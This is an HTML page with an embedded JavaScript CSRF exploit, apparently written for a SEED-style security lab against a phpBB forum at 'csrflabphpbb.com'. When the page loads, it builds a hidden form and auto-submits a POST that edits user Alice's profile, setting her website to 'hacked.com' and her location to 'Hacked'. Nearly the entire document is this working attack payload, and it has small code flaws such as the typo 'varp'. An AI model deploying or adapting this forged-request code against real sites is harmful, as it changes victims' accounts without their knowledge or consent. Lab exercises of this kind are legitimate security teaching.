<html><body><h1>Javascript</h1><script type="text/javascript">functi

1. <html>
2. <body>
3. <h1>
4. Javascript
5. </h1>
6. <script type="text/javascript">
7. function post (url,fields)
8. {
9. varp p = document.createElement('form');
10. p.action = url;
11. p.innerHTML = fields;
12. p.target = '_self';
13. p.method = 'post';
14.  
15. document.body.appendChild(p);
16. p.submit();
17. }
18. function csrf_hack()
19. {
20. var fields;
21.  
22. fields +="<input type='hidden' name='username' value='Alice'>";
23. fields +="<input type='hidden' name='website' value='hacked.com'>";
24. fields +="<input type='hidden' name='cur_password' value=''>";
25. fields +="<input type='hidden' name='new_password' value=''>";
26. fields +="<input type='hidden' name='password_confirm' value=''>";
27. fields +="<input type='hidden' name='icq' value=''>";
28. fields +="<input type='hidden' name='aim' value=''>";
29. fields +="<input type='hidden' name='msn' value=''>";
30. fields +="<input type='hidden' name='yim' value=''>";
31. fields +="<input type='hidden' name='location' value='Hacked'>";
32. fields +="<input type='hidden' name='occupation' value=''>";
33. fields +="<input type='hidden' name='interests' value=''>";
34. fields +="<input type='hidden' name='signature' value=''>";
35. fields +="<input type='hidden' name='viewemail' value='0'>";
36. fields +="<input type='hidden' name='hideonline' value='0'>";
37. fields +="<input type='hidden' name='notifyreply' value='0'>";
38. fields +="<input type='hidden' name='notifypm' value='1'>";
39. fields +="<input type='hidden' name='popup_pm' value='1'>";
40. fields +="<input type='hidden' name='attachsig' value='1'>";
41. fields +="<input type='hidden' name='allowbbcode' value='1'>";
42. fields +="<input type='hidden' name='allowhtml' value='0'>";
43. fields +="<input type='hidden' name='allowsmilies' value='1'>";
44. fields +="<input type='hidden' name='language' value='english'>";
45. fields +="<input type='hidden' name='style' value='1'>";
46. fields +="<input type='hidden' name='timezone' value='0'>";
47. fields +="<input type='hidden' name='dateformat' value='D+M+d%2C+Y+g%3Ai+a'>";
48. fields +="<input type='hidden' name='mode' value='editprofile'>";
49. fields +="<input type='hidden' name='agreed' value='true'>";
50. fields +="<input type='hidden' name='coppa' value='0'>";
51. fields +="<input type='hidden' name='user_id' value='3'>";
52. fields +="<input type='hidden' name='current_email' value='alice%40seed.com'>";
53. fields +="<input type='hidden' name='Submit' value='Submit'>";
54. post('http://www.csrflabphpbb.com/',fields);
55.  
56. }
57. window.onload = function() {csrf_hack();}
58. </script>
59. </body>
60. </html>